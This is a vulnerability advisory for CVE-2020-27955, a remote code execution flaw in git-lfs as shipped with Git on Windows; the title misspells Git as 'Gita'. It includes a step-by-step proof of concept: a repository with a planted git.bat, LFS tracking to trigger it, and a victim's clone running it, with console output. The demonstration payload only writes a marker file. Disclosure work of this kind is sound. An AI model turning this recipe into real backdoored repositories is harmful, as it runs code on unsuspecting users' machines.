Gita <= 2.29.2 - Remote Code Execution (RCE) via git-lfs

===========================================
- Discovered by: Dawid Golunski (@dawid_golunski)
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://exploitbox.io

- CVE-2020-27955
- Release date: 04.11.2020
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

Gita <= 2.29.2 - Remote Code Execution (RCE) via git-lfs


II. BACKGROUND
-------------------------


Git

"Git is a free and open source distributed version control system designed to 
handle everything from small to very large projects with speed and efficiency.

https://git-scm.com/


--


Git LFS

"An open source Git extension for versioning large files

Git Large File Storage (LFS) replaces large files such as audio samples, 
videos, datasets, and graphics with text pointers inside Git, while 
storing the file contents on a remote server like GitHub.com or GitHub 
Enterprise."

https://git-lfs.github.com/



III. INTRODUCTION
-------------------------


Git in versions <= 2.29.2 includes git-lfs extension which allows remote 
attackers to execute arbitrary code on the victim's Windows system upon a
clone operation.



IV. DESCRIPTION 
-------------------------


Due to the vulnerability in git-lfs described at:


Git-LFS <= 2.12 RCE Exploit



Attackers may be able to plant a backdoor in the root directory of a malicious 
repository by simply adding an executable file named as: 

- git.bat
- git.exe
- git.cmd 
- git.vbs

or any other executable extension available on the target Windows system 
(PATHEXT environment variable dependent).

As a result, the malicious git binary will get executed automatically
instead of the original git binary located in a trusted path.



V. PROOF OF CONCEPT
-------------------------


A git-lfs PoC exploit for git may be prepared with the following steps:



Attacker:

On a separate linux system (to prevent execution on the localhost on commit):


1. Create a new repository:

    mkdir git-lfs-RCE-exploit
    cd git-lfs-RCE-exploit
    git init


2. Prepare a malicious executable. E.g: git.bat with the following contents:

    @echo hacked > GITHACKED


3. Add the executable to the repository:

    git add git.bat


4. Add LFS file entries to the repository. This is necessary to trigger 
the vulnerable git-lfs extension when the repository is cloned and processed
by the main git process.

    git lfs track "*.dat"
    git add .gitattributes

    echo "git exploit PoC" > big-bug-lfs-file.dat
    git add big-bug-lfs-file.dat


5. Commit both the exploit and the lfs files:

    git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit"
    

6. Push the changes to the repository:

    git remote add origin https://github.com/some-user-name/lfspoc
    git push -u origin master



Victim:

On windows, run powershell.exe shell and clone the PoC repo:

    git clone https://github.com/some-user-name/lfspoc .

At this point the malicious executable (git.bat) will be downloaded into the repo's directory
and automatically executed by the git-lfs extension without any user interaction. 


As a result, 'GITHACKED' file should appear in the repo's directory 
To check, type:

    dir 




Alternatively, a demo repository with a plain-text bat file located at
https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git
can be used as follows:

C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git .

Cloning into '.'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0
Receiving objects: 100% (24/24), done.
Resolving deltas: 100% (5/5), done.
...

C:\Users\victim> type GITHACKED
hacked